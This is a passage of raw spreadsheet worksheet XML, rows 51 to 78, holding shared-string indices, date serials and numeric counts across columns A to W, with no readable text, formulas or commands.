      <c r="C51" t="s">
        <v>1055</v>
      </c>
      <c r="D51">
        <v>200</v>
      </c>
      <c r="E51" t="s">
        <v>1056</v>
      </c>
      <c r="F51">
        <v>200</v>
      </c>
      <c r="G51" t="s">
        <v>1057</v>
      </c>
      <c r="H51" t="s">
        <v>1058</v>
      </c>
      <c r="I51" t="s">
        <v>268</v>
      </c>
      <c r="J51" t="s">
        <v>566</v>
      </c>
      <c r="K51" t="s">
        <v>12</v>
      </c>
      <c r="L51" t="s">
        <v>77</v>
      </c>
      <c r="M51" t="s">
        <v>622</v>
      </c>
      <c r="N51" t="s">
        <v>623</v>
      </c>
      <c r="O51" t="s">
        <v>1059</v>
      </c>
      <c r="Q51" t="s">
        <v>3509</v>
      </c>
      <c r="R51">
        <v>2</v>
      </c>
      <c r="T51">
        <v>21669</v>
      </c>
      <c r="U51">
        <v>10135</v>
      </c>
      <c r="V51">
        <v>5891</v>
      </c>
      <c r="W51" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="52" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A52" t="s">
        <v>4</v>
      </c>
      <c r="B52">
        <v>44443.409976168979</v>
      </c>
      <c r="C52" t="s">
        <v>1062</v>
      </c>
      <c r="D52">
        <v>120</v>
      </c>
      <c r="E52" t="s">
        <v>1063</v>
      </c>
      <c r="F52">
        <v>101</v>
      </c>
      <c r="G52" t="s">
        <v>1064</v>
      </c>
      <c r="H52" t="s">
        <v>1065</v>
      </c>
      <c r="I52" t="s">
        <v>179</v>
      </c>
      <c r="J52" t="s">
        <v>180</v>
      </c>
      <c r="K52" t="s">
        <v>575</v>
      </c>
      <c r="L52" t="s">
        <v>77</v>
      </c>
      <c r="M52" t="s">
        <v>1066</v>
      </c>
      <c r="O52" t="s">
        <v>1067</v>
      </c>
      <c r="Q52" t="s">
        <v>3510</v>
      </c>
      <c r="R52">
        <v>15</v>
      </c>
      <c r="S52">
        <v>3</v>
      </c>
      <c r="T52">
        <v>21</v>
      </c>
      <c r="U52">
        <v>7</v>
      </c>
      <c r="V52">
        <v>19</v>
      </c>
      <c r="W52" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="53" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A53" t="s">
        <v>4</v>
      </c>
      <c r="B53">
        <v>44446.776413738429</v>
      </c>
      <c r="C53" t="s">
        <v>1062</v>
      </c>
      <c r="D53">
        <v>120</v>
      </c>
      <c r="E53" t="s">
        <v>1069</v>
      </c>
      <c r="F53">
        <v>101</v>
      </c>
      <c r="G53" t="s">
        <v>1070</v>
      </c>
      <c r="H53" t="s">
        <v>1071</v>
      </c>
      <c r="I53" t="s">
        <v>179</v>
      </c>
      <c r="J53" t="s">
        <v>180</v>
      </c>
      <c r="K53" t="s">
        <v>575</v>
      </c>
      <c r="L53" t="s">
        <v>77</v>
      </c>
      <c r="M53" t="s">
        <v>1066</v>
      </c>
      <c r="Q53" t="s">
        <v>3510</v>
      </c>
      <c r="R53">
        <v>4966</v>
      </c>
      <c r="S53">
        <v>8674</v>
      </c>
      <c r="T53">
        <v>5118</v>
      </c>
      <c r="U53">
        <v>5397</v>
      </c>
      <c r="V53">
        <v>4035</v>
      </c>
      <c r="W53" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="54" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A54" t="s">
        <v>4</v>
      </c>
      <c r="B54">
        <v>44446.77641377315</v>
      </c>
      <c r="C54" t="s">
        <v>1062</v>
      </c>
      <c r="D54">
        <v>120</v>
      </c>
      <c r="E54" t="s">
        <v>1072</v>
      </c>
      <c r="F54">
        <v>200</v>
      </c>
      <c r="G54" t="s">
        <v>1073</v>
      </c>
      <c r="H54" t="s">
        <v>1074</v>
      </c>
      <c r="I54" t="s">
        <v>179</v>
      </c>
      <c r="J54" t="s">
        <v>180</v>
      </c>
      <c r="K54" t="s">
        <v>575</v>
      </c>
      <c r="L54" t="s">
        <v>77</v>
      </c>
      <c r="M54" t="s">
        <v>1066</v>
      </c>
      <c r="Q54" t="s">
        <v>3510</v>
      </c>
      <c r="V54">
        <v>38</v>
      </c>
      <c r="W54" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="55" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A55" t="s">
        <v>4</v>
      </c>
      <c r="B55">
        <v>44446.77641377315</v>
      </c>
      <c r="C55" t="s">
        <v>1062</v>
      </c>
      <c r="D55">
        <v>120</v>
      </c>
      <c r="E55" t="s">
        <v>1075</v>
      </c>
      <c r="F55">
        <v>100</v>
      </c>
      <c r="G55" t="s">
        <v>1076</v>
      </c>
      <c r="H55" t="s">
        <v>1077</v>
      </c>
      <c r="I55" t="s">
        <v>179</v>
      </c>
      <c r="J55" t="s">
        <v>180</v>
      </c>
      <c r="K55" t="s">
        <v>575</v>
      </c>
      <c r="L55" t="s">
        <v>77</v>
      </c>
      <c r="M55" t="s">
        <v>1066</v>
      </c>
      <c r="Q55" t="s">
        <v>3510</v>
      </c>
      <c r="V55">
        <v>33</v>
      </c>
      <c r="W55" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="56" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A56" t="s">
        <v>4</v>
      </c>
      <c r="B56">
        <v>44405.437080625001</v>
      </c>
      <c r="C56" t="s">
        <v>1078</v>
      </c>
      <c r="D56">
        <v>200</v>
      </c>
      <c r="E56" t="s">
        <v>1079</v>
      </c>
      <c r="F56">
        <v>112</v>
      </c>
      <c r="G56" t="s">
        <v>1080</v>
      </c>
      <c r="H56" t="s">
        <v>1081</v>
      </c>
      <c r="I56" t="s">
        <v>179</v>
      </c>
      <c r="J56" t="s">
        <v>180</v>
      </c>
      <c r="K56" t="s">
        <v>575</v>
      </c>
      <c r="L56" t="s">
        <v>77</v>
      </c>
      <c r="M56" t="s">
        <v>1066</v>
      </c>
      <c r="O56" t="s">
        <v>1082</v>
      </c>
      <c r="Q56" t="s">
        <v>3511</v>
      </c>
      <c r="W56" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="57" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A57" t="s">
        <v>4</v>
      </c>
      <c r="B57">
        <v>44405.437080717595</v>
      </c>
      <c r="C57" t="s">
        <v>1078</v>
      </c>
      <c r="D57">
        <v>200</v>
      </c>
      <c r="E57" t="s">
        <v>1084</v>
      </c>
      <c r="F57">
        <v>200</v>
      </c>
      <c r="G57" t="s">
        <v>1085</v>
      </c>
      <c r="H57" t="s">
        <v>1086</v>
      </c>
      <c r="I57" t="s">
        <v>179</v>
      </c>
      <c r="J57" t="s">
        <v>180</v>
      </c>
      <c r="K57" t="s">
        <v>575</v>
      </c>
      <c r="L57" t="s">
        <v>77</v>
      </c>
      <c r="M57" t="s">
        <v>1066</v>
      </c>
      <c r="O57" t="s">
        <v>1087</v>
      </c>
      <c r="Q57" t="s">
        <v>3511</v>
      </c>
      <c r="W57" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="58" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A58" t="s">
        <v>4</v>
      </c>
      <c r="B58">
        <v>44405.437080671298</v>
      </c>
      <c r="C58" t="s">
        <v>1078</v>
      </c>
      <c r="D58">
        <v>200</v>
      </c>
      <c r="E58" t="s">
        <v>1084</v>
      </c>
      <c r="F58">
        <v>112</v>
      </c>
      <c r="G58" t="s">
        <v>1085</v>
      </c>
      <c r="H58" t="s">
        <v>1086</v>
      </c>
      <c r="I58" t="s">
        <v>179</v>
      </c>
      <c r="J58" t="s">
        <v>180</v>
      </c>
      <c r="K58" t="s">
        <v>575</v>
      </c>
      <c r="L58" t="s">
        <v>77</v>
      </c>
      <c r="M58" t="s">
        <v>1066</v>
      </c>
      <c r="O58" t="s">
        <v>1087</v>
      </c>
      <c r="Q58" t="s">
        <v>3511</v>
      </c>
      <c r="W58" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="59" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A59" t="s">
        <v>4</v>
      </c>
      <c r="B59">
        <v>44313.446493738425</v>
      </c>
      <c r="C59" t="s">
        <v>1094</v>
      </c>
      <c r="D59">
        <v>100</v>
      </c>
      <c r="E59" t="s">
        <v>1095</v>
      </c>
      <c r="F59">
        <v>100</v>
      </c>
      <c r="G59" t="s">
        <v>1096</v>
      </c>
      <c r="H59" t="s">
        <v>1097</v>
      </c>
      <c r="I59" t="s">
        <v>611</v>
      </c>
      <c r="J59" t="s">
        <v>612</v>
      </c>
      <c r="K59" t="s">
        <v>14</v>
      </c>
      <c r="L59" t="s">
        <v>77</v>
      </c>
      <c r="M59" t="s">
        <v>612</v>
      </c>
      <c r="N59" t="s">
        <v>1098</v>
      </c>
      <c r="Q59" t="s">
        <v>161</v>
      </c>
      <c r="W59" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="60" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A60" t="s">
        <v>4</v>
      </c>
      <c r="B60">
        <v>44068.684262800925</v>
      </c>
      <c r="C60" t="s">
        <v>1099</v>
      </c>
      <c r="D60">
        <v>100</v>
      </c>
      <c r="E60" t="s">
        <v>1100</v>
      </c>
      <c r="F60">
        <v>100</v>
      </c>
      <c r="G60" t="s">
        <v>1101</v>
      </c>
      <c r="H60" t="s">
        <v>1102</v>
      </c>
      <c r="I60" t="s">
        <v>103</v>
      </c>
      <c r="J60" t="s">
        <v>147</v>
      </c>
      <c r="K60" t="s">
        <v>35</v>
      </c>
      <c r="L60" t="s">
        <v>83</v>
      </c>
      <c r="M60" t="s">
        <v>148</v>
      </c>
      <c r="N60" t="s">
        <v>149</v>
      </c>
      <c r="O60" t="s">
        <v>1103</v>
      </c>
      <c r="Q60" t="s">
        <v>3512</v>
      </c>
      <c r="T60">
        <v>2</v>
      </c>
      <c r="W60" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="61" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A61" t="s">
        <v>4</v>
      </c>
      <c r="B61">
        <v>44474.595500729163</v>
      </c>
      <c r="C61" t="s">
        <v>1107</v>
      </c>
      <c r="D61">
        <v>101</v>
      </c>
      <c r="E61" t="s">
        <v>1108</v>
      </c>
      <c r="F61">
        <v>101</v>
      </c>
      <c r="G61" t="s">
        <v>1109</v>
      </c>
      <c r="H61" t="s">
        <v>1110</v>
      </c>
      <c r="I61" t="s">
        <v>179</v>
      </c>
      <c r="J61" t="s">
        <v>180</v>
      </c>
      <c r="K61" t="s">
        <v>575</v>
      </c>
      <c r="L61" t="s">
        <v>77</v>
      </c>
      <c r="M61" t="s">
        <v>1066</v>
      </c>
      <c r="Q61" t="s">
        <v>3513</v>
      </c>
      <c r="R61">
        <v>2980</v>
      </c>
      <c r="S61">
        <v>2782</v>
      </c>
      <c r="T61">
        <v>2435</v>
      </c>
      <c r="U61">
        <v>2131</v>
      </c>
      <c r="V61">
        <v>3708</v>
      </c>
      <c r="W61" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="62" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A62" t="s">
        <v>4</v>
      </c>
      <c r="B62">
        <v>44145.687615787036</v>
      </c>
      <c r="C62" t="s">
        <v>1121</v>
      </c>
      <c r="D62">
        <v>100</v>
      </c>
      <c r="E62" t="s">
        <v>1122</v>
      </c>
      <c r="F62">
        <v>100</v>
      </c>
      <c r="G62" t="s">
        <v>1123</v>
      </c>
      <c r="H62" t="s">
        <v>1124</v>
      </c>
      <c r="I62" t="s">
        <v>103</v>
      </c>
      <c r="J62" t="s">
        <v>104</v>
      </c>
      <c r="K62" t="s">
        <v>575</v>
      </c>
      <c r="L62" t="s">
        <v>83</v>
      </c>
      <c r="M62" t="s">
        <v>72</v>
      </c>
      <c r="N62" t="s">
        <v>1125</v>
      </c>
      <c r="O62" t="s">
        <v>111</v>
      </c>
      <c r="Q62" t="s">
        <v>3514</v>
      </c>
      <c r="R62">
        <v>6071</v>
      </c>
      <c r="S62">
        <v>5132</v>
      </c>
      <c r="T62">
        <v>6178</v>
      </c>
      <c r="U62">
        <v>8587</v>
      </c>
      <c r="V62">
        <v>13047</v>
      </c>
      <c r="W62" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="63" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A63" t="s">
        <v>4</v>
      </c>
      <c r="B63">
        <v>44599.734224305554</v>
      </c>
      <c r="C63" t="s">
        <v>1143</v>
      </c>
      <c r="D63">
        <v>218</v>
      </c>
      <c r="E63" t="s">
        <v>1144</v>
      </c>
      <c r="F63">
        <v>104</v>
      </c>
      <c r="G63" t="s">
        <v>1145</v>
      </c>
      <c r="H63" t="s">
        <v>1146</v>
      </c>
      <c r="I63" t="s">
        <v>156</v>
      </c>
      <c r="J63" t="s">
        <v>226</v>
      </c>
      <c r="K63" t="s">
        <v>27</v>
      </c>
      <c r="L63" t="s">
        <v>77</v>
      </c>
      <c r="M63" t="s">
        <v>308</v>
      </c>
      <c r="N63" t="s">
        <v>309</v>
      </c>
      <c r="Q63" t="s">
        <v>3515</v>
      </c>
      <c r="R63">
        <v>2979</v>
      </c>
      <c r="S63">
        <v>2786</v>
      </c>
      <c r="T63">
        <v>2423</v>
      </c>
      <c r="U63">
        <v>2122</v>
      </c>
      <c r="V63">
        <v>2379</v>
      </c>
      <c r="W63" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="64" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A64" t="s">
        <v>4</v>
      </c>
      <c r="B64">
        <v>44126.670747928241</v>
      </c>
      <c r="C64" t="s">
        <v>1143</v>
      </c>
      <c r="D64">
        <v>110</v>
      </c>
      <c r="E64" t="s">
        <v>1148</v>
      </c>
      <c r="F64">
        <v>100</v>
      </c>
      <c r="G64" t="s">
        <v>1149</v>
      </c>
      <c r="H64" t="s">
        <v>1150</v>
      </c>
      <c r="I64" t="s">
        <v>156</v>
      </c>
      <c r="J64" t="s">
        <v>226</v>
      </c>
      <c r="K64" t="s">
        <v>27</v>
      </c>
      <c r="L64" t="s">
        <v>77</v>
      </c>
      <c r="M64" t="s">
        <v>308</v>
      </c>
      <c r="N64" t="s">
        <v>309</v>
      </c>
      <c r="O64" t="s">
        <v>1151</v>
      </c>
      <c r="Q64" t="s">
        <v>3516</v>
      </c>
      <c r="R64">
        <v>20913</v>
      </c>
      <c r="S64">
        <v>228308</v>
      </c>
      <c r="T64">
        <v>269274</v>
      </c>
      <c r="U64">
        <v>665987</v>
      </c>
      <c r="V64">
        <v>613589</v>
      </c>
      <c r="W64" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="65" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A65" t="s">
        <v>4</v>
      </c>
      <c r="B65">
        <v>44599.734224259257</v>
      </c>
      <c r="C65" t="s">
        <v>1143</v>
      </c>
      <c r="D65">
        <v>218</v>
      </c>
      <c r="E65" t="s">
        <v>1148</v>
      </c>
      <c r="F65">
        <v>216</v>
      </c>
      <c r="G65" t="s">
        <v>1149</v>
      </c>
      <c r="H65" t="s">
        <v>1153</v>
      </c>
      <c r="I65" t="s">
        <v>156</v>
      </c>
      <c r="J65" t="s">
        <v>226</v>
      </c>
      <c r="K65" t="s">
        <v>27</v>
      </c>
      <c r="L65" t="s">
        <v>77</v>
      </c>
      <c r="M65" t="s">
        <v>308</v>
      </c>
      <c r="N65" t="s">
        <v>309</v>
      </c>
      <c r="O65" t="s">
        <v>1151</v>
      </c>
      <c r="Q65" t="s">
        <v>3515</v>
      </c>
      <c r="R65">
        <v>20913</v>
      </c>
      <c r="S65">
        <v>228308</v>
      </c>
      <c r="T65">
        <v>269274</v>
      </c>
      <c r="U65">
        <v>665987</v>
      </c>
      <c r="V65">
        <v>613589</v>
      </c>
      <c r="W65" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="66" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A66" t="s">
        <v>4</v>
      </c>
      <c r="B66">
        <v>44152.496694965281</v>
      </c>
      <c r="C66" t="s">
        <v>1143</v>
      </c>
      <c r="D66">
        <v>110</v>
      </c>
      <c r="E66" t="s">
        <v>1154</v>
      </c>
      <c r="F66">
        <v>100</v>
      </c>
      <c r="G66" t="s">
        <v>1155</v>
      </c>
      <c r="H66" t="s">
        <v>1156</v>
      </c>
      <c r="I66" t="s">
        <v>156</v>
      </c>
      <c r="J66" t="s">
        <v>226</v>
      </c>
      <c r="K66" t="s">
        <v>27</v>
      </c>
      <c r="L66" t="s">
        <v>77</v>
      </c>
      <c r="M66" t="s">
        <v>308</v>
      </c>
      <c r="N66" t="s">
        <v>309</v>
      </c>
      <c r="O66" t="s">
        <v>1157</v>
      </c>
      <c r="Q66" t="s">
        <v>3516</v>
      </c>
      <c r="R66">
        <v>111917</v>
      </c>
      <c r="S66">
        <v>142428</v>
      </c>
      <c r="T66">
        <v>111778</v>
      </c>
      <c r="U66">
        <v>126742</v>
      </c>
      <c r="V66">
        <v>134285</v>
      </c>
      <c r="W66" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="67" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A67" t="s">
        <v>4</v>
      </c>
      <c r="B67">
        <v>44462.622378622684</v>
      </c>
      <c r="C67" t="s">
        <v>1143</v>
      </c>
      <c r="D67">
        <v>218</v>
      </c>
      <c r="E67" t="s">
        <v>1154</v>
      </c>
      <c r="F67">
        <v>105</v>
      </c>
      <c r="G67" t="s">
        <v>1155</v>
      </c>
      <c r="H67" t="s">
        <v>1156</v>
      </c>
      <c r="I67" t="s">
        <v>156</v>
      </c>
      <c r="J67" t="s">
        <v>226</v>
      </c>
      <c r="K67" t="s">
        <v>27</v>
      </c>
      <c r="L67" t="s">
        <v>77</v>
      </c>
      <c r="M67" t="s">
        <v>308</v>
      </c>
      <c r="N67" t="s">
        <v>309</v>
      </c>
      <c r="O67" t="s">
        <v>1157</v>
      </c>
      <c r="Q67" t="s">
        <v>3515</v>
      </c>
      <c r="R67">
        <v>111917</v>
      </c>
      <c r="S67">
        <v>142428</v>
      </c>
      <c r="T67">
        <v>111778</v>
      </c>
      <c r="U67">
        <v>126742</v>
      </c>
      <c r="V67">
        <v>134285</v>
      </c>
      <c r="W67" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="68" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A68" t="s">
        <v>4</v>
      </c>
      <c r="B68">
        <v>44462.622378657405</v>
      </c>
      <c r="C68" t="s">
        <v>1143</v>
      </c>
      <c r="D68">
        <v>218</v>
      </c>
      <c r="E68" t="s">
        <v>1158</v>
      </c>
      <c r="F68">
        <v>104</v>
      </c>
      <c r="G68" t="s">
        <v>1159</v>
      </c>
      <c r="H68" t="s">
        <v>1160</v>
      </c>
      <c r="I68" t="s">
        <v>156</v>
      </c>
      <c r="J68" t="s">
        <v>226</v>
      </c>
      <c r="K68" t="s">
        <v>27</v>
      </c>
      <c r="L68" t="s">
        <v>77</v>
      </c>
      <c r="M68" t="s">
        <v>308</v>
      </c>
      <c r="N68" t="s">
        <v>309</v>
      </c>
      <c r="O68" t="s">
        <v>1161</v>
      </c>
      <c r="Q68" t="s">
        <v>3515</v>
      </c>
      <c r="R68">
        <v>2984</v>
      </c>
      <c r="S68">
        <v>2783</v>
      </c>
      <c r="T68">
        <v>2422</v>
      </c>
      <c r="U68">
        <v>2144</v>
      </c>
      <c r="V68">
        <v>3436</v>
      </c>
      <c r="W68" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="69" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A69" t="s">
        <v>4</v>
      </c>
      <c r="B69">
        <v>44462.622378668981</v>
      </c>
      <c r="C69" t="s">
        <v>1143</v>
      </c>
      <c r="D69">
        <v>218</v>
      </c>
      <c r="E69" t="s">
        <v>1162</v>
      </c>
      <c r="F69">
        <v>102</v>
      </c>
      <c r="G69" t="s">
        <v>1163</v>
      </c>
      <c r="H69" t="s">
        <v>1164</v>
      </c>
      <c r="I69" t="s">
        <v>156</v>
      </c>
      <c r="J69" t="s">
        <v>226</v>
      </c>
      <c r="K69" t="s">
        <v>27</v>
      </c>
      <c r="L69" t="s">
        <v>77</v>
      </c>
      <c r="M69" t="s">
        <v>308</v>
      </c>
      <c r="N69" t="s">
        <v>309</v>
      </c>
      <c r="O69" t="s">
        <v>1165</v>
      </c>
      <c r="Q69" t="s">
        <v>3515</v>
      </c>
      <c r="W69" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="70" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A70" t="s">
        <v>4</v>
      </c>
      <c r="B70">
        <v>44599.734224282409</v>
      </c>
      <c r="C70" t="s">
        <v>1143</v>
      </c>
      <c r="D70">
        <v>218</v>
      </c>
      <c r="E70" t="s">
        <v>1166</v>
      </c>
      <c r="F70">
        <v>106</v>
      </c>
      <c r="G70" t="s">
        <v>1167</v>
      </c>
      <c r="H70" t="s">
        <v>1168</v>
      </c>
      <c r="I70" t="s">
        <v>156</v>
      </c>
      <c r="J70" t="s">
        <v>226</v>
      </c>
      <c r="K70" t="s">
        <v>27</v>
      </c>
      <c r="L70" t="s">
        <v>77</v>
      </c>
      <c r="M70" t="s">
        <v>308</v>
      </c>
      <c r="N70" t="s">
        <v>309</v>
      </c>
      <c r="O70" t="s">
        <v>1157</v>
      </c>
      <c r="Q70" t="s">
        <v>3515</v>
      </c>
      <c r="R70">
        <v>3663</v>
      </c>
      <c r="S70">
        <v>8815</v>
      </c>
      <c r="T70">
        <v>7134</v>
      </c>
      <c r="U70">
        <v>6422</v>
      </c>
      <c r="V70">
        <v>2469</v>
      </c>
      <c r="W70" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="71" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A71" t="s">
        <v>4</v>
      </c>
      <c r="B71">
        <v>43949.460110196756</v>
      </c>
      <c r="C71" t="s">
        <v>1169</v>
      </c>
      <c r="D71">
        <v>110</v>
      </c>
      <c r="E71" t="s">
        <v>1170</v>
      </c>
      <c r="F71">
        <v>100</v>
      </c>
      <c r="G71" t="s">
        <v>1171</v>
      </c>
      <c r="H71" t="s">
        <v>1172</v>
      </c>
      <c r="I71" t="s">
        <v>156</v>
      </c>
      <c r="J71" t="s">
        <v>226</v>
      </c>
      <c r="K71" t="s">
        <v>27</v>
      </c>
      <c r="L71" t="s">
        <v>77</v>
      </c>
      <c r="M71" t="s">
        <v>308</v>
      </c>
      <c r="N71" t="s">
        <v>309</v>
      </c>
      <c r="O71" t="s">
        <v>1173</v>
      </c>
      <c r="P71" t="s">
        <v>1174</v>
      </c>
      <c r="Q71" t="s">
        <v>3517</v>
      </c>
      <c r="W71" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="72" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A72" t="s">
        <v>4</v>
      </c>
      <c r="B72">
        <v>43984.606301539352</v>
      </c>
      <c r="C72" t="s">
        <v>1169</v>
      </c>
      <c r="D72">
        <v>110</v>
      </c>
      <c r="E72" t="s">
        <v>1176</v>
      </c>
      <c r="F72">
        <v>100</v>
      </c>
      <c r="G72" t="s">
        <v>1177</v>
      </c>
      <c r="H72" t="s">
        <v>1178</v>
      </c>
      <c r="I72" t="s">
        <v>156</v>
      </c>
      <c r="J72" t="s">
        <v>226</v>
      </c>
      <c r="K72" t="s">
        <v>27</v>
      </c>
      <c r="L72" t="s">
        <v>77</v>
      </c>
      <c r="M72" t="s">
        <v>308</v>
      </c>
      <c r="N72" t="s">
        <v>309</v>
      </c>
      <c r="O72" t="s">
        <v>1179</v>
      </c>
      <c r="P72" t="s">
        <v>504</v>
      </c>
      <c r="Q72" t="s">
        <v>3517</v>
      </c>
      <c r="W72" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="73" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A73" t="s">
        <v>4</v>
      </c>
      <c r="B73">
        <v>43984.606301516207</v>
      </c>
      <c r="C73" t="s">
        <v>1169</v>
      </c>
      <c r="D73">
        <v>110</v>
      </c>
      <c r="E73" t="s">
        <v>1180</v>
      </c>
      <c r="F73">
        <v>100</v>
      </c>
      <c r="G73" t="s">
        <v>1181</v>
      </c>
      <c r="H73" t="s">
        <v>1182</v>
      </c>
      <c r="I73" t="s">
        <v>156</v>
      </c>
      <c r="J73" t="s">
        <v>226</v>
      </c>
      <c r="K73" t="s">
        <v>27</v>
      </c>
      <c r="L73" t="s">
        <v>77</v>
      </c>
      <c r="M73" t="s">
        <v>308</v>
      </c>
      <c r="N73" t="s">
        <v>309</v>
      </c>
      <c r="O73" t="s">
        <v>1151</v>
      </c>
      <c r="P73" t="s">
        <v>504</v>
      </c>
      <c r="Q73" t="s">
        <v>3517</v>
      </c>
      <c r="R73">
        <v>7141</v>
      </c>
      <c r="S73">
        <v>7231</v>
      </c>
      <c r="T73">
        <v>8824</v>
      </c>
      <c r="U73">
        <v>8983</v>
      </c>
      <c r="V73">
        <v>9468</v>
      </c>
      <c r="W73" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="74" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A74" t="s">
        <v>4</v>
      </c>
      <c r="B74">
        <v>44399.427325983794</v>
      </c>
      <c r="C74" t="s">
        <v>1183</v>
      </c>
      <c r="D74">
        <v>101</v>
      </c>
      <c r="E74" t="s">
        <v>1184</v>
      </c>
      <c r="F74">
        <v>101</v>
      </c>
      <c r="G74" t="s">
        <v>1185</v>
      </c>
      <c r="H74" t="s">
        <v>1186</v>
      </c>
      <c r="I74" t="s">
        <v>203</v>
      </c>
      <c r="J74" t="s">
        <v>204</v>
      </c>
      <c r="K74" t="s">
        <v>28</v>
      </c>
      <c r="L74" t="s">
        <v>83</v>
      </c>
      <c r="M74" t="s">
        <v>72</v>
      </c>
      <c r="Q74" t="s">
        <v>161</v>
      </c>
      <c r="W74" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="75" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A75" t="s">
        <v>4</v>
      </c>
      <c r="B75">
        <v>44594.610880381944</v>
      </c>
      <c r="C75" t="s">
        <v>1187</v>
      </c>
      <c r="D75">
        <v>101</v>
      </c>
      <c r="E75" t="s">
        <v>1188</v>
      </c>
      <c r="F75">
        <v>101</v>
      </c>
      <c r="G75" t="s">
        <v>1189</v>
      </c>
      <c r="H75" t="s">
        <v>1190</v>
      </c>
      <c r="I75" t="s">
        <v>179</v>
      </c>
      <c r="J75" t="s">
        <v>180</v>
      </c>
      <c r="K75" t="s">
        <v>575</v>
      </c>
      <c r="L75" t="s">
        <v>77</v>
      </c>
      <c r="M75" t="s">
        <v>1066</v>
      </c>
      <c r="Q75" t="s">
        <v>3518</v>
      </c>
      <c r="R75">
        <v>25</v>
      </c>
      <c r="S75">
        <v>7</v>
      </c>
      <c r="T75">
        <v>1</v>
      </c>
      <c r="W75" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="76" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A76" t="s">
        <v>4</v>
      </c>
      <c r="B76">
        <v>44405.670701782408</v>
      </c>
      <c r="C76" t="s">
        <v>1192</v>
      </c>
      <c r="D76">
        <v>120</v>
      </c>
      <c r="E76" t="s">
        <v>1193</v>
      </c>
      <c r="F76">
        <v>120</v>
      </c>
      <c r="G76" t="s">
        <v>1194</v>
      </c>
      <c r="H76" t="s">
        <v>1074</v>
      </c>
      <c r="I76" t="s">
        <v>75</v>
      </c>
      <c r="J76" t="s">
        <v>76</v>
      </c>
      <c r="K76" t="s">
        <v>575</v>
      </c>
      <c r="L76" t="s">
        <v>77</v>
      </c>
      <c r="M76" t="s">
        <v>1195</v>
      </c>
      <c r="O76" t="s">
        <v>1196</v>
      </c>
      <c r="Q76" t="s">
        <v>3519</v>
      </c>
      <c r="R76">
        <v>15067</v>
      </c>
      <c r="S76">
        <v>13821</v>
      </c>
      <c r="T76">
        <v>12778</v>
      </c>
      <c r="U76">
        <v>12994</v>
      </c>
      <c r="V76">
        <v>13343</v>
      </c>
      <c r="W76" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="77" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A77" t="s">
        <v>4</v>
      </c>
      <c r="B77">
        <v>44405.670701932868</v>
      </c>
      <c r="C77" t="s">
        <v>1192</v>
      </c>
      <c r="D77">
        <v>120</v>
      </c>
      <c r="E77" t="s">
        <v>1198</v>
      </c>
      <c r="F77">
        <v>100</v>
      </c>
      <c r="G77" t="s">
        <v>1199</v>
      </c>
      <c r="H77" t="s">
        <v>1200</v>
      </c>
      <c r="I77" t="s">
        <v>75</v>
      </c>
      <c r="J77" t="s">
        <v>76</v>
      </c>
      <c r="K77" t="s">
        <v>575</v>
      </c>
      <c r="L77" t="s">
        <v>77</v>
      </c>
      <c r="M77" t="s">
        <v>76</v>
      </c>
      <c r="O77" t="s">
        <v>1201</v>
      </c>
      <c r="Q77" t="s">
        <v>3519</v>
      </c>
      <c r="R77">
        <v>15064</v>
      </c>
      <c r="S77">
        <v>13821</v>
      </c>
      <c r="T77">
        <v>12772</v>
      </c>
      <c r="U77">
        <v>12993</v>
      </c>
      <c r="V77">
        <v>13357</v>
      </c>
      <c r="W77" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="78" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A78" t="s">
        <v>4</v>
      </c>
      <c r="B78">
        <v>44405.670701817129</v>
      </c>
      <c r="C78" t="s">
        <v>1192</v>
      </c>
      <c r="D78">
        <v>120</v>
      </c>
      <c r="E78" t="s">
        <v>1202</v>
      </c>
      <c r="F78">
        <v>100</v>
      </c>
      <c r="G78" t="s">
        <v>1203</v>
      </c>
      <c r="H78" t="s">
        <v>1204</v>
      </c>
      <c r="I78" t="s">
        <v>75</v>
